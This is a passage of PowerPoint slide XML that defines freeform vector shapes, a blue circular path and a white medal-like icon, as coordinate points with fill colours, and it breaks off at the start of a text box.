                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="926" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1184" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1290" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1335" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1409" y="420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1459" y="556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467" y="592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1481" y="704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="742"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5387721" y="1754600"/>
              <a:ext cx="656939" cy="787432"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="455" y="403"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="455" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502" y="406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547" y="415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568" y="423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589" y="431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609" y="440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583" y="363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568" y="343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="889" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659" y="473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659" y="473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690" y="500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690" y="500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700" y="512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711" y="524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721" y="536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738" y="563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747" y="576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754" y="591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761" y="605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767" y="620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776" y="652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785" y="701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786" y="717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786" y="752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785" y="768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780" y="800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776" y="817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772" y="833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767" y="848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761" y="863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754" y="878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747" y="892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738" y="906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721" y="932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711" y="945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700" y="957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690" y="969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690" y="969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679" y="980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666" y="989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654" y="999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641" y="1009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628" y="1018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614" y="1025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599" y="1033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569" y="1046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554" y="1050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539" y="1054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="1059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506" y="1062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490" y="1063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472" y="1065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="1065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="1065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439" y="1065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421" y="1063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405" y="1062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389" y="1059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373" y="1054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="1050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="1046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="1033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="1025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="1018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271" y="1009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257" y="999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233" y="980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222" y="969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222" y="969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128" y="784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128" y="683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222" y="500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222" y="500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233" y="489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276" y="393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276" y="455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276" y="455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295" y="443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317" y="433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338" y="424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361" y="416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383" y="411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407" y="406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431" y="404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="403"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="556" y="328"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="795" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="328"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="522" y="283"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="729" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="283"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="491" y="240"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="663" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491" y="240"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="272" y="362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544" y="362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="508" y="918"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="508" y="550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439" y="550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439" y="550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438" y="557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436" y="565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431" y="572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427" y="580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427" y="580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420" y="587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413" y="591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405" y="594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396" y="595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396" y="648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508" y="918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508" y="918"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="646" y="543"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="646" y="543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627" y="526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606" y="511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584" y="496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548" y="480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535" y="476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496" y="467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414" y="467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375" y="476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363" y="480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231" y="583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202" y="641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189" y="693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187" y="706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187" y="761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202" y="826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231" y="885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351" y="983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363" y="987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375" y="992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401" y="998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414" y="1001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="1002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442" y="1003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="1003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="1003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469" y="1003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483" y="1002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496" y="1001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509" y="998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535" y="992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548" y="987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560" y="983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584" y="971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606" y="958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627" y="943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646" y="925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646" y="925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663" y="906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679" y="885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693" y="862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704" y="840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709" y="826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713" y="815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717" y="802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720" y="788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722" y="775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722" y="693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720" y="680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713" y="654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709" y="641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693" y="605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679" y="583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663" y="563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646" y="543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646" y="543"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
